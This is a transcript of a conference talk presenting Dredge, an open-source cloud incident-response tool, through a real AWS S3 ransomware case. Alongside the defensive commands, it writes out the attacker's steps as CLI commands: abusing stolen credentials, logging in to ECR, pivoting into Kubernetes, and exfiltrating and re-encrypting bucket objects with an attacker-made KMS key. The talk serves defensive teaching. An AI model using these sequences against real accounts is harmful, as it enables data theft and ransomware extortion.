
I'm going to talk to you a little bit about an open source tool that we released for doing incident response in the cloud. The idea of this talk is to approach it through the story of a real incident that happened to us, that we had to attend for a client, and how we used this tool to cover those gaps that usually exist in teams, especially when we are working on incident response in environments as technical and specific as the cloud is today. First, let me introduce myself. I'm from Argentina, from Buenos Aires. I'm the CTO of Solidarity Labs, and previously I worked many years as an incident responder, before that
as a cloud architect, and before that as a police officer in the Federal Police. My background comes from the incident response side, embracing cloud issues since 2017, 2018. So I could watch the field mature in a lot of ways: how those techniques started to take shape and how attackers tried to compromise these ecosystems, from more advanced positions to less advanced ones. So the idea is to tell you a little about how an incident looks from a CSIRT, unlike how it looks in theory, and how we cover those gaps with open source. We found out about the incident because the client called us and said that he saw this. What is this?
This is the web page our client's web site was serving: it had been encrypted. If you can see here, it says "Server-side encryption: AWS KMS managed key". What does this mean? Our client was using AWS to host his website in an S3 bucket. Who here works with or knows AWS? Great, great. Has anyone ever tried hosting a website in an S3 bucket? It's something super simple that gets reused a lot. The drama is that if you don't properly harden the infrastructure, it can end up like this. As always in these environments, there were no alerts, there was no security detection. So we found out from the impact, which is how it usually happens in most real incidents. Most detections come with indications that turn out to be false positives, a matter of the noise generated by the detection strategies themselves. When we work as a CSIRT, we work on those cases where the whole triage stage has already passed, when the incident is already confirmed. Since they didn't have alerts, we didn't know where the attack came from either. The only thing we had as a reference was that their site had been encrypted. Why Dredge? Imagine the number of organizations that move to the cloud today, in particular with the possibility of being boosted by all the artificial intelligence and ChatGPT. It is very easy for a company to go into production with a working application. But when it comes to defending it, it's already very difficult to get the talent and tools that can help harden that infrastructure. And I'm not even talking about security detection strategies, blue teaming, threat hunting, and all those things that are much more advanced. Especially when things like CrowdStrike happen, right? It's not that an attacker is compromising us; because of a lack of internal processes, we don't validate the things that are running within our infrastructure, and we end up with our own allies attacking us, right? It happens a lot in startups: if I have CrowdStrike installed on my machines, I should be able to validate a patch before it applies, right? But that doesn't happen. So we end up having to do incident response on our own internals, again, without much information. So, from the point of view of a CSIRT, there are two sides from which an incident can arrive. The good side is when we prepared ourselves, and the bad side is when we didn't. The bad side will inevitably happen to us, because we can't prepare for everything. What we have to do is strategically reduce the unknowns to knowns, so that the smallest number of incidents come from the bad side and the largest number come from the good side, because incidents will happen.
As a reference for those who like to take photos: the QR code down there is the repo where Dredge is published, and the whole presentation is also uploaded there, so if you want to download it, you can download it from there. Dredge is a tool for doing incident response. It is specifically designed for this case: to help us when we have to deal with an incident for which the defender did not prepare properly, or when the attack exceeded the defender's preparation. Why? Because when I have the preparation, I have many more ways to investigate what is happening. I have many more log sources, I have alerts, I have an escalation matrix, I know the infrastructure I use. And the big drama with the cloud is that many times, in many companies, the security teams themselves don't know that the company is using the cloud. It is very common to find cases of shadow IT where the marketing manager puts in his card and buys a subscription on AWS, GCP or Azure to host a website where he spends $20 a year, but it is collecting sensitive information from the company. And the vast majority of the tools that let us solve this problem cost a lot of money or require a lot of effort. But it's important to understand how an attack looks in theory versus how it looks in reality.
When you see the theory of how an attack works, in the cloud as anywhere else, we think we have an attack and we know where to look for the logs. But the truth is that sometimes we go through different stages, realizing that we don't even know if we have an attack, if we are the ones generating the problem, if it's a feature that is actually behaving like a bug, or if it's something else that's wrong. Getting to that point requires a lot of effort. Not to mention that the vast majority of cybersecurity roles are either very specific, meaning people are super specialized in what they do, or they are very generalist. There is no middle ground. And in particular in Argentina, and I suppose something similar happens here, when a person specializes in incident response or cloud, it is very likely that a company that pays much better will come and take them. So, since we, being a CSIRT, have to train people across a bunch of clouds, imagine an analyst who starts working, we train him in AWS, and there's an incident in Azure. It's similar, but not the same. Or there's an incident in GCP. Or it's an incident in Kubernetes. From a theoretical point of view, all the components are similar. But from a practical point of view, there are many differences. So the goal of Dredge is that an analyst can respond to incidents in different cloud environments just by knowing how to respond to an incident in the cloud. If I know that I have to block an IP, I don't have to worry about knowing how to block an IP in AWS versus how to block an IP in GCP. I can execute the command that says "block this IP", because it's a tactical issue that requires a lot of speed. From the point of view of engineers and DevOps, they have another problem. They are there to make the company's time to market as low as possible. They are there to make the feature reach production. So, in those cases, they don't take care of learning about security. But when an incident occurs, they have to respond all the same. And many times they don't have assistance. So a DevOps or an engineer knows what to do, but doesn't know how to do it. Maybe they understand that they have to block the IP, but they don't know the details. Or they understand that they need to collect information, but they don't know what information. The vast majority of the tools that offer cloud information are designed from a compliance point of view. What does this mean? That they offer a lot of data, and in the middle of an incident that is noise. We will see it in the demos. I don't like PPTs very much, so I'm going to try to get through this as quickly as possible so that we can jump to the demos. What we did is try to make sure that the reconnaissance done on the infrastructure, from the point of view of the analyst or the engineer, yields exactly the information we need to respond to the incident, no more, no less. So, what does Dredge do? Dredge has four fundamental modules: Log Retriever, Threat Hunting, Incident Response, and Cloud Status. Let's start with Log Retriever, which lets us work with the APIs of the different cloud providers to obtain the logs that we need. Have you ever tried to download a log from an S3 bucket?
Have you ever had that need? Well, notice that out of the whole auditorium, it's only you. Most people implement the logs, store them in the S3 bucket, and then don't know how to get them out. It's like: we do what the security strategy tells us, but we don't worry about how to download the logs. Especially in small companies that don't have a SIEM or tools to process those logs. So, in the event of an incident, we have to access that log quickly and we don't know how. Dredge allows us to download the logs from any S3 bucket in a simple way, with one command.
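For reference, this is roughly what that step looks like with the plain AWS CLI; the bucket and profile names here are hypothetical:

```bash
# List what the log bucket actually contains, then pull it all down locally.
aws s3 ls s3://my-log-bucket --recursive --profile ir
aws s3 sync s3://my-log-bucket ./logs --profile ir
```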
In AWS, for example, the vast majority of the logs that matter for analyzing an incident are the API call logs. We'll see them later, but they are the logs that are stored in CloudTrail. If I don't have CloudTrail enabled, it's very complicated to solve an incident, because in theory I can't see what happened in my tenant during that time. But AWS keeps them enabled by default in a feature called Event History. The thing is that collecting them through the API is super complicated, and collecting them through the console is even more complicated. So basically what we did was a script that automates that process, so that you can download those logs in a simple, easy way across different profiles.
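To give an idea of why this is painful by hand, a sketch of the raw Event History pull with the AWS CLI; region, profile, and file names are placeholders:

```bash
# Event History is queried through CloudTrail's LookupEvents API,
# a page at a time, so you must chase NextToken page after page.
aws cloudtrail lookup-events --region sa-east-1 --profile ir \
  --max-results 50 > page1.json
aws cloudtrail lookup-events --region sa-east-1 --profile ir \
  --max-results 50 --next-token "$(jq -r '.NextToken' page1.json)" > page2.json
```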
The same applies to Kubernetes logs, pods, Docker containers. Notice that when you start to look at the amount of information you need to have in these ecosystems, with the technology stacks we use all the time, in the vast majority of cases we don't even have those sources in mind. And if we don't have them in mind, we don't know how to get them out. So the idea is to pave the way so that it is the same for everyone.
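As a reminder of how scattered those sources are, here are the usual manual commands (all names are hypothetical):

```bash
# Each runtime keeps its logs somewhere else:
kubectl logs my-pod -n my-namespace --previous   # pod logs, including the last crashed run
kubectl get events -n my-namespace               # cluster-level events
docker logs my-container                         # a single container's logs
```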
Then, within the Threat Hunting tools, what we incorporated are some scripts that let us enrich the information we are seeing. For example, it happened to us that suddenly we had giant data dumps and we had to filter by IP. So we'd be hunting around for a grep command that filters out the IPs. But we also wanted to see only the public IPs, or the public IPs that have a certain connotation for us, or cross them with certain IPs that we know are bad. So we have that whole battery of tests added into the Threat Hunting module. What else can we do within Threat Hunting? We can enrich those IPs with queries to Shodan or VirusTotal. From the analyst's point of view, it's much easier to work from the CLI without having to copy and paste each of the IPs into the Shodan or VirusTotal front end.
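The grep we kept reaching for looks roughly like this; a sketch that extracts every IPv4 from a dump and drops the private ranges:

```bash
# Pull unique IPv4 addresses out of a log dump, then filter out RFC 1918
# and loopback ranges so only public addresses are left to triage.
grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' dump.json | sort -u |
  grep -vE '^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|127\.)'
```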
Something else we can do, which is not listed here, is flag API calls with known bad reputations. All the ways of attacking the cloud are thoroughly documented, at least at a basic level. So we run the tool, it looks through the API calls within our AWS tenant, and it tells us which of those API calls are known to be used for persistence. For example, if I see the creation of an SSH key within the AWS tenant. If I see that a port has been opened through a security group, a network firewall, or however it is applied inside that cloud. If I see that the way my GitHub repo is hardened has changed. All these kinds of non-trivial things we have automated here, so that with a simple command the analyst can at least do a triage in a much simpler way.
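A rough idea of that hunt, done by hand with jq over a CloudTrail dump; the event names below are real CloudTrail event names, while the file name is a placeholder and the standard format with a Records array is assumed:

```bash
# Surface API calls commonly associated with persistence or key abuse.
jq -r '.Records[]
       | select(.eventName | IN("CreateKey", "ImportKeyPair",
                "AuthorizeSecurityGroupIngress", "CreateAccessKey", "CreateUser"))
       | [.eventTime, .eventName, .sourceIPAddress] | @tsv' cloudtrail_dump.json
```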
Then we have another module, called Incident Response. Incident Response lets us automate non-trivial actions that we use to contain the incident. For example, disabling credentials. In every AWS-related talk, they say: "They compromise user credentials, they compromise credentials, they compromise a role." Well, disabling credentials is not trivial, and in different cloud environments it is executed differently. The same with servers: blocking an IP in AWS is super different from blocking it in GCP. For the analyst, it has to be transparent. With Dredge, we can do that. We can, for example, take S3 buckets that are public and make them private, we can enable logs that are disabled, we can work on credentials; there are many things that make this task easier. And since it's a script, we can also automate on top of it. A very common case: I have an indicator of compromise, that is, I know this IP is attacking me, and I have to block it. But I have 200 accounts within my tenant, and within each account I have 10 VPCs. The process of blocking that IP in every network of every account is ultra complicated, unless I can script it. So, with Dredge, we can do that scripting.
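For a sense of what gets scripted, a sketch of the per-account step using network ACL deny rules; the IP is a placeholder, and an outer loop over profiles would cover the other accounts:

```bash
ATTACKER_IP="203.0.113.10"   # hypothetical indicator of compromise
# Add a deny rule for that IP to every network ACL in the account
# (rule number 10 is assumed to be free in each ACL).
for acl in $(aws ec2 describe-network-acls \
               --query 'NetworkAcls[].NetworkAclId' --output text); do
  aws ec2 create-network-acl-entry --network-acl-id "$acl" \
    --rule-number 10 --protocol -1 --rule-action deny \
    --ingress --cidr-block "${ATTACKER_IP}/32"
done
```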
And finally, Cloud Status is a tool that lets us obtain strategic information, as I said before. If I want to see the users of an AWS account, I'm not that interested in all the metadata AWS gives me, which is a lot; I'm interested in seeing, for example, the creation date. Tools like CloudSploit don't tell me when the user was created. Why do I care about the creation date? Basically because I want to know if it was before or after the incident.
The same with credentials, with access keys. If a credential was created moments after the incident, that gives me an indication that the credential may be malicious, and the perspective that I have to start investigating there. This is a work in progress; we keep adding features, we are organizing all the things we see are necessary to integrate, and we keep adding them here. So any collaboration is also super welcome. So, the idea is: we are going to do a Dredge setup, I'm going to show you how it is configured and how it is set up, and we are going to go through a bit of the incident I was telling you about, the ransomware in S3, so you can see how that works and how we used the tool to investigate it, so that we can see it in action. Well, this is the Dredge repo. This is the documentation, where you can see basically a small description of what it does, what I just told you, and the functionalities that we have and that we are about to integrate, in a JSON format that has a lot of information; later we will work on one in particular. But we started to get the sense of something kind of weird within one of the components that was working with Kubernetes. Unfortunately, the Kubernetes logs that get enabled this way were all disabled. That is, everything that was logging on the cluster was disabled. With Dredge, we can enable all those logs with one command. That doesn't let us go back and understand what already happened, but it does let us start monitoring what will happen from now on. So if the attacker keeps working on our infrastructure, we will be able to start seeing it.
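On EKS, that one-shot enablement corresponds to a single API call; a sketch with a hypothetical cluster name:

```bash
# Turn on all five EKS control-plane log types (api, audit, authenticator,
# controllerManager, scheduler) so activity flows into CloudWatch Logs.
aws eks update-cluster-config --name prod-cluster \
  --logging '{"clusterLogging":[{"types":["api","audit","authenticator","controllerManager","scheduler"],"enabled":true}]}'
```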
Within what we had already seen in Event History, we could see API calls working on a KMS key that we had not identified. That is to say, there was someone creating encryption keys to encrypt components within our tenant. Which was, by the way, disturbing: why is there someone creating keys when we don't even use that service? So, I'm going to show you how we obtained the logs from Event History with Dredge. Do you see this? Can you see it? Dredge starts bringing me all the logs from that account in JSON to analyze. We can dump this to a text file and work with the traditional tools we always use: awk, jq, whatever. The files will be in the Dredge dump directory, and we will be able to see all the different files. This is an example of how it can be analyzed: with jq we can run the queries we need to look at specific fields, such as user agent, source IP, and anything else that interests us in the incident.
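For example, two jq one-liners of the kind we ran over that dump (the file name is a placeholder; the field names are the standard CloudTrail ones):

```bash
# Rank the source IPs seen across all recorded API calls.
jq -r '.Records[].sourceIPAddress' dump.json | sort | uniq -c | sort -rn
# Show which API calls were made with a Boto3 (scripted) user agent.
jq -r '.Records[] | select(.userAgent | test("Boto3"; "i")) | .eventName' dump.json
```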
As you can see, the idea is that it's one command. If I had to do that manually, I'd have to go into the AWS console, which means creating a user with console permissions, which is already a risk. I'd have to get into Event History and do this analysis in the AWS web interface, which looks like this: I can see a maximum of 50 or 100 events at a time, and I have to start paging through, which makes everything much more complex. So, this way, we solve it much more simply. In particular, if I have 5 accounts, in the console I have to log in to one AWS account, pull the events, log out, log in to the next account, pull the events. In contrast, with Dredge, I can run 5 iterations, or script it to work with 5 different accounts or 5 different profiles, and download all the information at once. This is what the CloudTrail log looks like. We can see the KMS CreateKey, which means the attacker was creating an encryption key within AWS. We can see the user agent, which says "Boto3 Python". That means the attacker is using an automated tool to execute this creation.
And then come the detailed descriptions of the action's metadata. Within the CloudTrail log I can also see, for example, the source IPs from which that was executed. What caught our attention even more was an API call named "GetAuthorizationToken". That API call is an authentication against an ECR. ECR is the Elastic Container Registry, which is where a company can store its Docker images to run them inside its network. That is, if I have a secure environment, the execution of my code comes from a source I trust, and the source I trust is my registry. But what happens if a person can authenticate against my registry? That source of trust is compromised. So we could see there was a GetAuthorizationToken, that is, someone authenticating from an IP that belonged to AWS. That was kind of weird. But it gave us a clue, because it also came from us-east-1, when all our infrastructure was in Sao Paulo. So suddenly there were mismatches that said: why is someone executing things from a region we don't use? We started to investigate, and we realized that within the infrastructure's setup, they had enabled deployments to Kubernetes from the ECR. But the ECR could be managed by any of the DevOps. So, suddenly, there was a whole flow in which someone had authenticated to the ECR, had uploaded an image following these commands, had managed to put their own malicious image inside the ECR, and had been able to run it inside the Kubernetes cluster to execute this ransomware. We were able to reconstruct this by analyzing the Event History logs, which allowed us to do all the traceability: even though, when we started filtering, we saw things that came from AWS, we could identify that the first API call came from AWS. That let us do a cross-analysis and identify the IAM user that was running all this, which was the user of an engineer who had been compromised. IAM users have policies; the policies are what allow them to do or not do things. This user, as is common in DevOps, was a full admin. That is to say, it had a policy with Action asterisk and Resource asterisk. This is ultra-critical, but it is usually done for time-to-market reasons. The company says: well, we have to do it fast, we'll do it like this and fix it later, and they never fix it. They compromised the credentials, they managed to access the ECR, and that way they were able to compromise the Kubernetes cluster.
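Checking for that kind of policy on a suspect user is straightforward; a sketch with hypothetical user, policy, and account values — in the output you are looking for "Action": "*" together with "Resource": "*":

```bash
# Which managed policies does the user carry?
aws iam list-attached-user-policies --user-name terraform-deploy
# Dump one policy's active version to read the actual statements.
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy \
  --version-id v1
```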
The architecture was more or less like this; as you can see, there were different components. We have EKS, which is AWS's way of running Kubernetes. We had the EC2 servers, which were the servers used to run the cluster. The problem with the EC2 servers is that, as part of a Kubernetes cluster, they are created and destroyed constantly, so we couldn't work on them to obtain logs. Then they had a load balancer, they had the WAF, they had the ECR with Docker images, and they were serving some things from S3. This is more or less what the infrastructure looked like, and that's what allowed us to do the investigation.
Now, once we identified that, we had to look at all the users, to see whether any other user was part of the compromise. So we ran Dredge again, but this time with the Cloud Status module. Again, we say AWS, we give it the profile to authenticate, we give it the region, and we say: bring me all the IAM users. So Dredge runs and brings me all the IAM users. As you can see, it brings me all the information I need, and it doesn't bring me the information I don't need. It tells me whether MFA is enabled, which is something I'd normally have to go look for, since I can't get it directly. It tells me when the user was created, and whether it has console access. That's all the information we need to assess the possibility of a user being compromised. Because if it has MFA, it's much harder to compromise than if it doesn't; a user without MFA is a much easier target.
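The raw-CLI version of that triage takes several calls per user, which is exactly the noise Dredge trims; profile and user names here are placeholders:

```bash
# Names and creation dates for every IAM user.
aws iam list-users --profile ir \
  --query 'Users[].[UserName,CreateDate,PasswordLastUsed]' --output table
# MFA has to be asked for user by user; an empty list means no MFA.
aws iam list-mfa-devices --user-name some-user --profile ir
# Console access too: this call errors out if the user has no login profile.
aws iam get-login-profile --user-name some-user --profile ir
```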
Another thing we can do is work on the access keys directly, without going through the users. If we know there is a compromised access key, many times we don't know which user it belongs to, so we can start working from that side. We run Dredge with the Cloud Status module, we pass it the profile and the region to authenticate, and it tells us which access keys exist in that account, whether they are enabled or not, when they were created, and which user each one belongs to, which also helps with the analysis. If I have an attack where I see an access key and I don't know which user it is, I can start matching it from here.
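By hand, that mapping looks something like this (the user name is a placeholder, and the key ID is AWS's documentation example):

```bash
# Keys for one user, with status and creation date.
aws iam list-access-keys --user-name terraform-deploy \
  --query 'AccessKeyMetadata[].[AccessKeyId,Status,CreateDate]' --output table
# If all you have is a key ID, this at least tells you which account owns it.
aws sts get-access-key-info --access-key-id AKIAIOSFODNN7EXAMPLE
```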
We worked a lot with the Kubernetes pod logs, because with them we can see where things are being executed, where the pods and the images are being created. We also found the attacker's authentication to the Kubernetes cluster using the CLI and kubectl. What was the impact? As we saw, the impact was a compromise of the S3 bucket through ransomware. How does ransomware work in S3? Basically, the attacker downloads the objects in the bucket, to leak the information. Then he uploads the objects re-encrypted with a new key: he creates an encryption key and writes the objects back into the bucket encrypted with it. And then he deletes the user that owns that key. Encryption keys in AWS have an owner, and if that owner is gone, not even a root user or an admin user will be able to use the key. Which is ultra-complex, because I can be the most root of roots and I will never be able to use that key again, so I will not be able to decrypt the objects inside the bucket. The other problem is that the logs generated by default inside AWS are about the S3 bucket, not about the objects in the bucket. So if I didn't previously enable the S3 data events, I won't be able to see what happened to the objects inside the bucket.
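Enabling that object-level visibility ahead of time is one CloudTrail call; a sketch with hypothetical trail and bucket names:

```bash
# Record S3 data events (object reads/writes) for one bucket on an existing trail.
aws cloudtrail put-event-selectors --trail-name main-trail \
  --event-selectors '[{"ReadWriteType":"All","IncludeManagementEvents":true,
    "DataResources":[{"Type":"AWS::S3::Object","Values":["arn:aws:s3:::my-site-bucket/"]}]}]'
```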
So now I'm going to show you a demo of how the initial access went. As the initial access to Kubernetes was recorded, basically what the attacker did was load the AWS credentials. Those credentials are no longer in use, so don't worry. Then he does an "sts get-caller-identity". This API call is like a "whoami" inside AWS: it lets me understand, hey, which user am I running as here, and what permissions does it have? As you can see, this is a Terraform user, a user DevOps used to run their infrastructure as code. Then he tries to find out whether the user has a login profile, that is, whether it can log in to the console.
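Those first recon steps, reproduced with the plain CLI (all values are placeholders):

```bash
# Load the stolen credentials into the environment.
export AWS_ACCESS_KEY_ID="AKIA..." AWS_SECRET_ACCESS_KEY="..."
# The "whoami" of AWS: account ID, user ID, and ARN of the caller.
aws sts get-caller-identity
# Does this user have console access? Errors with NoSuchEntity if not.
aws iam get-login-profile --user-name terraform-deploy
```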
Now, the attacker had an IAM user that was designed as a service user, but had console access. When we get the user list with Dredge, we can see whether each user has console access or not. So, if I see a user that in my inventory figures as a service user, but in the Dredge output has console access, that's bad, right? From this we can also learn which API calls interest us for detecting lateral movement or privilege escalation. These API calls are not picked up by traditional detection tools like GuardDuty, so they allow us to build more advanced detection cases that do catch this. This is what access to the AWS console looks like.
This is how the attacker moves once he has access to the Container Registry. He logs in with get-login-password, with the region and the profile he compromised, and does a docker login. That lets him work against the Docker registry. Then he can run docker ps and work with the images he has on his machine.
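That login flow is the documented ECR one; a sketch with placeholder account ID, region, and profile:

```bash
# Exchange AWS credentials for a short-lived Docker registry password.
aws ecr get-login-password --region us-east-1 --profile stolen |
  docker login --username AWS --password-stdin \
    123456789012.dkr.ecr.us-east-1.amazonaws.com
# List the images available locally to tag and push into the registry.
docker images
```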
Here I'm going to show you how authentication against Kubernetes works. The attacker can do a list-clusters, that is, use the AWS tooling to find out if there is a Kubernetes cluster running. That way, he knows where to run his image. Then he runs an update-kubeconfig with the compromised profile and user, and with that he moves from AWS into the Kubernetes cluster. Again, another API call that I know is malicious when it comes from a user who shouldn't be doing it: if I see my Terraform user setting itself up to run kubectl, which is an action for a human user and not a service user, that's bad. And here he runs a manifest with an unapproved image.
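The pivot, spelled out with real AWS and kubectl commands (cluster, region, profile, and manifest names are placeholders):

```bash
# Is there a cluster to land on?
aws eks list-clusters --region sa-east-1 --profile stolen
# Write kubeconfig credentials for it: this is the AWS-to-Kubernetes pivot.
aws eks update-kubeconfig --name prod-cluster --region sa-east-1 --profile stolen
# Deploy the rogue image pushed to ECR earlier.
kubectl apply -f malicious-manifest.yaml
```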
Well, how did we proceed with the response? How did we respond? The first thing we did was triage: we identified that we could delete that user. Since we were deeply involved in the process and had direct access to the CTO and the technology side, we were able to validate that we could delete that user without affecting a business process. The idea is always to try not to generate more downtime than the incident already is. So, having corroborated that, we proceeded to delete the user. Again, with Dredge we run the Incident Response module, we tell it we are going to AWS, so we have to re-authenticate, and we say: delete the IAM user, with the username, that's it. Dredge is going to delete an IAM user, and that is not trivial; it has to do several things, because the IAM user has several components hanging off it. Before deleting an IAM user, I have to delete the access keys, detach the policies, and remove the console access. If I try to delete an IAM user without doing those things first, my API call is going to fail. So, if the incident responder is not trained in the things that have to be done beforehand, what happens is that those API calls fail, or he tries and can't, and that takes time.
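For reference, the prerequisite chain looks roughly like this with the raw CLI (user, key, and policy values are placeholders, and a real user may also have groups and inline policies to remove):

```bash
aws iam delete-login-profile --user-name terraform-deploy      # console access
aws iam list-access-keys     --user-name terraform-deploy      # find the keys...
aws iam delete-access-key    --user-name terraform-deploy \
  --access-key-id AKIAIOSFODNN7EXAMPLE                         # ...and delete them
aws iam detach-user-policy   --user-name terraform-deploy \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess     # detach policies
aws iam delete-user          --user-name terraform-deploy      # only now this works
```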
Within the script, what we did is handle all the validations needed so that the user gets deleted without hitting those impediments. Then we did an IP analysis. Again, over the API calls we had, we ran the module that extracts the source IPs. This is an example: we ran Dredge, the Threat Hunting module, and we said, give me all the IPs that are in this file. And it gives me an output of all the IPs in the file. Then we run it against VirusTotal.
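Under the hood, this kind of enrichment is one VirusTotal v3 request per IP; a minimal sketch, assuming an API key in VT_API_KEY and a file with one IP per line:

```bash
for ip in $(cat ips.txt); do
  curl -s -H "x-apikey: $VT_API_KEY" \
    "https://www.virustotal.com/api/v3/ip_addresses/$ip" |
    jq '{ip: .data.id,
         country: .data.attributes.country,
         as_owner: .data.attributes.as_owner,
         malicious: .data.attributes.last_analysis_stats.malicious}'
done
```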
We pass it the VirusTotal API key, it runs the file against the VirusTotal API, and it tells us whether those IPs are identified as malicious inside VirusTotal, what their origin is, and what hosting is running them. That lets us understand where they are attacking us from, what country it is, whether it matches what we normally use. As you can see, we have several Amazon IPs, a couple from Argentina, and one from the United States. That can be super trivial, of course. Many times we find that we have Chinese IPs, for example, and the VirusTotal integration lets us see that. We can quickly see that there are IPs coming from Amazon servers, which we can then rule in or out, but at least we get that information in a super fast way. This is another example of how to enrich with VirusTotal, maybe you can see it better here; I'm working with fewer IPs so it runs faster. But basically it's the same: we pass the VirusTotal key, we pass the dump, in this case of GuardDuty alerts, and we find out the countries, whether each IP is bad or not, and what the AS name and AS number are. If we are working with a particular AS number, for example we know the attacker operates from that side, or uses a certain cloud provider to launch attacks, or we know there's a particular attacker who starts hitting us from GCP, we can start blocking the requests to our servers that come from GCP, for example. Another thing we can do is enable security detection. As I said, in our incident the company did not have GuardDuty enabled. With Dredge we can enable it, and we can also pull its findings. The same thing happens as with Event History: if I have 100 accounts and I have to look at the GuardDuty events in every account, it becomes quite annoying, because I have to log in to each of the accounts. But we can do them all in a scripted way.
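A sketch of that per-account step with the raw CLI; region handling and error checking are omitted:

```bash
# Enable GuardDuty (errors if a detector already exists, which is harmless here).
aws guardduty create-detector --enable
DETECTOR=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)
IDS=$(aws guardduty list-findings --detector-id "$DETECTOR" \
        --query 'FindingIds[]' --output text)
# get-findings accepts up to 50 IDs per call; fine for a quick triage.
aws guardduty get-findings --detector-id "$DETECTOR" --finding-ids $IDS > guardduty.json
```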
Again, the Log Retriever module: we authenticate, and notice that the methodology is the same in every case, so it's much easier to onboard an analyst who knows he has to use the Log Retriever module and just looks at which logs he can get. And there we download all the GuardDuty findings in JSON to do the analysis. What is this for? Again, I can query it with jq, I can pull out the IPs, and I can do the analysis much faster than looking at each event manually in the console, yes? Now, working with the S3 bucket: as I said, this S3 bucket is static web hosting, right? Which means that, by definition, it has to be public on the internet; that's part of the need. Many times when people do an analysis they say, hey, we have to block all public buckets. No, because there are buckets that are meant to be public. But during the incident it is good to block it, so we can handle things internally without the whole world finding out that our web page was encrypted, right? So, with the Incident Response module, we can work the same way, in the same repeatable manner: we call the Incident Response module, we authenticate, we pass the command to block the S3 bucket, and the tool blocks it. It disables public web access. Wait for it. Again, disabling public access is not a trivial task, especially if you have a lot of buckets. As you can see, it's much easier for us with the tool.
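The per-bucket equivalent is the S3 public access block call; the bucket name is hypothetical:

```bash
# Cut all public access paths to the bucket in one shot.
aws s3api put-public-access-block --bucket my-site-bucket \
  --public-access-block-configuration \
  'BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true'
```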
The last demo I wanted to show here is how to isolate an EC2 instance inside AWS. The problem with isolating EC2 instances at the networking level is that networking in each cloud works very differently. For example, in GCP I can block or delete with a firewall rule. In AWS I have two kinds of firewalls: security groups, which let me authorize, and network access control lists, which let me block. Normally, what response procedures do is: if I have a security group that allows access to that server, I change it to a forensic security group, so that nobody else can connect to the server. The problem is that this action does not cut the existing connections. So if I have persistence on the server, even though I can no longer reconnect, I don't get kicked out. I still have persistence on the server, and that lets me execute other persistence methodologies from inside it. On top of that, resources within AWS have permissions to execute actions on the cloud. So if I have persistence on the server and the server has access to AWS, I can make a lateral movement within AWS with the server's credentials. Since this process is not trivial, again, we automated it too. We use Dredge, Cloud Status, and again we pull all the servers. It takes a little longer. So, what we're going to do is bring all the AWS servers. And there I have my server: where it is, in which region, whether it has metadata version 1 (IMDSv1) enabled, that is, whether by landing inside the server I can grab the server's credentials, and what its role is, that is, what AWS permissions the server has. That is super important. Then I can analyze the security groups the server has, to know what its permissions are. These are things that a Cloud Security Posture Management tool doesn't give me. So, in that way, I've already profiled the server with two commands, without having to try to do it manually from the console. Then I call the Incident Response module, I use the responder function, and I tell it: isolate this EC2 instance. Plain and simple, I don't have to do anything else.
So what it does is: it obtains certain server data, for example the security groups and the VPC ID; it creates a new network access control list to block the server from all connections, that is, it kills all existing connections; then it restores the previous network access control list, giving the server its normal network permissions back, so that the connections that have to exist keep functioning and only the attacker's established sessions get killed. It creates a forensic security group and assigns that forensic security group to the server. In that way, the server starts over clean: we have our server with the forensic security group, as I explained.
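A sketch of those steps with the raw CLI (all IDs are placeholders): the NACL swap is what kills established connections, and the rule-less forensic security group is what blocks new ones:

```bash
# 1. A forensic security group: no inbound rules, and we revoke the default
#    allow-all egress so nothing can talk out either.
SG=$(aws ec2 create-security-group --group-name forensic-sg \
       --description "IR isolation" --vpc-id vpc-0abc1234 \
       --query GroupId --output text)
aws ec2 revoke-security-group-egress --group-id "$SG" \
  --ip-permissions '[{"IpProtocol":"-1","IpRanges":[{"CidrIp":"0.0.0.0/0"}]}]'
# 2. Swap the instance onto it: blocks new connections (but not existing ones;
#    that is why the subnet's network ACL gets bounced first).
aws ec2 modify-instance-attribute --instance-id i-0abc1234 --groups "$SG"
```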
We put a network access control list in place to block all access, and at the same time we reopened it, so that if there was something else inside that network that needed to communicate, it could communicate. If you followed me to here, yes, it went very fast. How did we get here? Well, to finish, and so you can start thinking about your questions, I'm going to show you how the ransomware in S3 works. This is something we found super interesting, because it's not common. The S3 ransomware, as I said, operates in a very methodical way: the information is downloaded, the encryption key is created, the objects are encrypted, and the ransom note is uploaded so that the defender knows their bucket was encrypted.
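As a recap, that methodology maps to a handful of calls; a sketch with placeholder names, shown only so the defender knows what to look for in the logs:

```bash
aws s3 sync s3://victim-site ./loot                    # 1. exfiltrate the objects
KEY=$(aws kms create-key --query KeyMetadata.KeyId --output text)  # 2. attacker's key
aws s3 cp ./ransom-note.html s3://victim-site/index.html \
  --sse aws:kms --sse-kms-key-id "$KEY"                # 3. write back encrypted
# 4. Finally, the victim's ability to use the key is removed.
```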
Now I'll leave this up so you can download it if you want to look at the code, which is open source. We'll do the demo and then we'll wrap up.